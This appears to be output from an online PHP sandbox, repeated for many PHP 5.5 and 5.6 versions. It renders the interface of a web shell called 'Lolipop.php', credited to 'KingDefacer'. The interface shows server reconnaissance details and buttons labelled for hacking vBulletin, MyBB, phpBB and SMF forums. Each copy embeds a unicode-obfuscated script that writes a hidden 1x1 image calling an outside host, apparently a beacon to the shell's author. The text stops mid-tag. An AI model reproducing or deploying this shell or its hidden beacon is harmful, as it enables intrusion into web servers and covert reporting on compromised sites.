cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.6.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.6.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.38
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.38</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.37
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.37</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.36
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.36</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.35
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.35</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 5.5.34
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>5.5.34</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>//</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>pcntl_fork,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a 